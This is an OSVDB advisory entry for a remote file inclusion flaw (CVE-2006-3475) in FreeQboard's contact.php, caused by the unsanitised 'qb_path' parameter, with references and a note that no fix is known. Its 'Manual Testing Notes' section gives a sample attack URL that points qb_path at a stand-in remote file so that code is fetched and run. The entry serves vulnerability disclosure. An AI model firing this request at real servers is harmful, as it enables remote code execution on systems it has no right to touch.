FreeQboard contact.php qb_path Variable Remote File Inclusion

2006-07-02T05:19:32
ID OSVDB:28061
Type osvdb
Reporter CrAsh_oVeR_rIdE(KARKOR23@hotmail.com)
Modified 2006-07-02T05:19:32

Description

Vulnerability Description

FreeQboard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the contact.php script not properly sanitizing user input supplied to the 'qb_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

FreeQboard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the contact.php script not properly sanitizing user input supplied to the 'qb_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/(path)/contact.php?qb_path=http://evilcode.txt?

References:

Vendor URL: http://sourceforge.net/projects/freeqboard/ Security Tracker: 1016433 Related OSVDB ID: 28059 Related OSVDB ID: 28060 Related OSVDB ID: 28063 Related OSVDB ID: 28064 Related OSVDB ID: 28065 Related OSVDB ID: 28062 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0024.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0027.html ISS X-Force ID: 27040 CVE-2006-3475 Bugtraq ID: 18788